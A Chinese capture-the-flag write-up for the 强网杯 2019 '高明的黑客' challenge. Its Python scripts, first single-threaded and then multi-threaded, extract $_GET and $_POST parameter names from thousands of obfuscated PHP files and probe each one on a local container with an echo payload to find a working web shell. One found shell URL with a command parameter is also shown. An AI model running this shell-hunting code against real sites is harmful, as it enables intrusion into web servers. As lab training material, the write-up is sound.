高明的黑客

D盾扫一堆混淆+shell,不过没有几个是能用的,需要跑个脚本,考察脚本编写能力的,测试一下哪个是能用的。

上py

import os
import requests
# 文件路径
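# Directory of the unpacked web root; every file in it is a candidate shell.
# The doubled separators are tolerated by Windows path handling.
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# Regular files only: os.listdir() also returns sub-directories (the author
# hit `.idea`), and open() on a directory aborts the scan of that entry.
files = [
    name for name in os.listdir(path)
    if os.path.isfile(os.path.join(path, name))
]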


# GET方法传参
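def php_param_names(lines, superglobal):
    """Collect the quoted keys read from a PHP superglobal in *lines*.

    Args:
        lines: iterable of source lines (an open text file works).
        superglobal: the array name as written in the source, e.g. ``"$_GET"``.

    Returns:
        Parameter names in order of appearance, duplicates kept, e.g.
        ``["cmd"]`` for ``eval($_GET['cmd']);``.  Both ``['key']`` and
        ``["key"]`` are recognised, every occurrence on a line is taken (the
        old code stopped after the first), a match at column 0 counts, and a
        key whose closing quote is missing on the line is skipped.
    """
    names = []
    for line in lines:
        for quote in ("'", '"'):
            marker = superglobal + "[" + quote
            pos = line.find(marker)
            # str.find() signals "absent" with -1; the old `> 0` test also
            # dropped a marker sitting at the very start of the line.
            while pos != -1:
                start = pos + len(marker)
                end = line.find(quote, start)
                if end == -1:
                    break
                names.append(line[start:end])
                pos = line.find(marker, end + 1)
    return names


def GET(filename):
    """Return the ``$_GET[...]`` parameter names used by ``path + filename``.

    The file is decoded as UTF-8 with undecodable bytes replaced, so an
    obfuscated shell carrying binary junk does not abort the whole scan;
    ASCII parameter names survive the replacement intact.
    """
    # `with` releases the handle; the old code leaked one per scanned file.
    with open(path + filename, "r", encoding="utf-8", errors="replace") as src:
        return php_param_names(src, "$_GET")


def POST(filename):
    """Return the ``$_POST[...]`` parameter names used by ``path + filename``.

    Same decoding and matching rules as :func:`GET`.
    """
    with open(path + filename, "r", encoding="utf-8", errors="replace") as src:
        return php_param_names(src, "$_POST")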


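if __name__ == "__main__":
    # Probe every candidate against the local container; a working shell
    # echoes the marker back.  NOTE(review): a page that reflects its input
    # verbatim also contains the marker, so confirm any hit by hand; an
    # eval()-style shell needs a trailing ';' to parse, so a miss does not
    # prove the file inert.
    for file in files:
        if file != ".idea":
            print("OPEN FILE:" + file)
            for param in GET(file):
                # The old code mixed %s/$s placeholders with str.format(), so
                # the URL went out literally and nothing was ever substituted.
                url = "http://127.0.0.1/{}?{}={}".format(file, param, 'echo "GET SUCCESS"')
                # A timeout keeps one stalled request from hanging the scan.
                response = requests.get(url=url, timeout=10)
                # `in` also catches a marker at index 0, which `find(...) > 0` missed.
                if "GET SUCCESS" in response.text:
                    print("SUCCESS GET! YOU FIND THE SHELL {} BY {}".format(file, param))
                    raise SystemExit(0)

            for param in POST(file):
                url = "http://127.0.0.1/{}".format(file)
                data = {param: 'echo "POST SUCCESS"'}
                # $_POST is only populated by a POST request; the old
                # requests.get() call never delivered the parameter.
                response = requests.post(url=url, data=data, timeout=10)
                if "POST SUCCESS" in response.text:
                    print("SUCCESS POST! YOU FIND THE SHELL {} BY {}".format(file, param))
                    raise SystemExit(0)

        print("CLOSE FILE")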

贼捞,大概一分钟跑七到八个这样子,算了算根本跑不完。(而且这一版有两个硬伤:URL 里写的是 `%s`/`$s` 占位符却用 `.format()` 填充,占位符根本没被替换,请求一直发到字面量地址;POST 分支用的是 `requests.get`,`$_POST` 拿不到数据——所以即便跑完也不会命中。)

还是要多线程,最后参考大佬脚本搞的。

/xk0SzyKwfzw.php?Efa5BVG=echo%20%27success%27
import os
import sys
import threading
import time
from concurrent.futures import ThreadPoolExecutor, as_completed

import requests

# 文件路径
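# Directory of the unpacked web root; every file in it is a candidate shell.
# The doubled separators are tolerated by Windows path handling.
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# Regular files only: os.listdir() also returns sub-directories (e.g. `.idea`),
# and open() on a directory would kill the worker probing that entry.
files = [
    name for name in os.listdir(path)
    if os.path.isfile(os.path.join(path, name))
]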


# GET方法传参
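def php_param_names(lines, superglobal):
    """Collect the quoted keys read from a PHP superglobal in *lines*.

    Args:
        lines: iterable of source lines (an open text file works).
        superglobal: the array name as written in the source, e.g. ``"$_GET"``.

    Returns:
        Parameter names in order of appearance, duplicates kept, e.g.
        ``["cmd"]`` for ``eval($_GET['cmd']);``.  Both ``['key']`` and
        ``["key"]`` are recognised, every occurrence on a line is taken (the
        old code stopped after the first), a match at column 0 counts, and a
        key whose closing quote is missing on the line is skipped.
    """
    names = []
    for line in lines:
        for quote in ("'", '"'):
            marker = superglobal + "[" + quote
            pos = line.find(marker)
            # str.find() signals "absent" with -1; the old `> 0` test also
            # dropped a marker sitting at the very start of the line.
            while pos != -1:
                start = pos + len(marker)
                end = line.find(quote, start)
                if end == -1:
                    break
                names.append(line[start:end])
                pos = line.find(marker, end + 1)
    return names


def GET(filename):
    """Return the ``$_GET[...]`` parameter names used by ``path + filename``.

    The file is decoded as UTF-8 with undecodable bytes replaced, so an
    obfuscated shell carrying binary junk does not abort the whole scan;
    ASCII parameter names survive the replacement intact.
    """
    # `with` releases the handle; the old code leaked one per scanned file.
    with open(path + filename, "r", encoding="utf-8", errors="replace") as src:
        return php_param_names(src, "$_GET")


def POST(filename):
    """Return the ``$_POST[...]`` parameter names used by ``path + filename``.

    Same decoding and matching rules as :func:`GET`.
    """
    with open(path + filename, "r", encoding="utf-8", errors="replace") as src:
        return php_param_names(src, "$_POST")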


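def get_content(file, base_url="http://127.0.0.1/src/"):
    """Probe one candidate file for a working web shell and record the hit.

    Every ``$_GET`` parameter is tried with a GET request and every
    ``$_POST`` parameter with a POST request, each carrying an
    ``echo "... SUCCESS"`` payload.  A response containing the marker is
    treated as a working shell: the body is written to ``shell.txt`` and
    ``sys.exit(0)`` is raised.

    Args:
        file: file name, relative both to ``path`` (for parsing) and to
            ``base_url`` (for the request).
        base_url: URL prefix the file is served under; defaults to the
            local challenge container.

    Raises:
        SystemExit: when a marker comes back.  Inside a worker thread this
            ends only that thread; the caller has to collect it (e.g. from
            a future) to stop the rest of the scan.

    NOTE(review): a page that reflects its input verbatim also contains the
    marker, so confirm any hit by hand; an eval()-style shell needs a
    trailing ';' to parse, so a miss does not prove the file inert.
    """
    print("OPEN FILE:" + file)
    for param in GET(file):
        url = "{}{}?{}={}".format(base_url, file, param, 'echo "GET SUCCESS"')
        # A timeout keeps one stalled request from hanging the worker forever.
        response = requests.get(url=url, timeout=10)
        # `in` also catches a marker at index 0, which `find(...) > 0` missed.
        if "GET SUCCESS" in response.text:
            print("SUCCESS GET! YOU FIND THE SHELL {} BY {}".format(file, param))
            with open("shell.txt", "w") as out:
                out.write(response.text)
            sys.exit(0)

    for param in POST(file):
        url = "{}{}".format(base_url, file)
        data = {param: 'echo "POST SUCCESS"'}
        # $_POST is only populated by a POST request; the old requests.get()
        # call never delivered the parameter.
        response = requests.post(url=url, data=data, timeout=10)
        if "POST SUCCESS" in response.text:
            print("SUCCESS POST! YOU FIND THE SHELL {} BY {}".format(file, param))
            with open("shell.txt", "w") as out:
                out.write(response.text)
            sys.exit(0)

    print("CLOSE FILE")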


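if __name__ == "__main__":
    # A bounded pool does what the unused Semaphore(100) was meant to do:
    # one thread per file would spawn thousands of threads against the
    # target.  (The old loop also called get_content() synchronously and then
    # again in a thread, so every file was probed twice.)
    #
    # `requests.adapters.DEFAULT_RETRIES = 5` was dropped: HTTPAdapter binds
    # that default when the class is defined, so assigning the module
    # attribute afterwards has no effect on requests.get()/post().
    with ThreadPoolExecutor(max_workers=100) as pool:
        pending = {pool.submit(get_content, name): name for name in files}
        for done in as_completed(pending):
            try:
                done.result()
            except SystemExit:
                # get_content() found a shell.  sys.exit() in a worker ends
                # only that worker, so cancel what has not started yet and
                # re-raise the exit from the main thread.
                for other in pending:
                    other.cancel()
                raise
            except Exception as exc:  # unreadable file, connection error, ...
                # Keep scanning the remaining files, as the old per-thread
                # tracebacks effectively did, but say which file failed.
                print("ERROR {}: {}".format(pending[done], exc))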
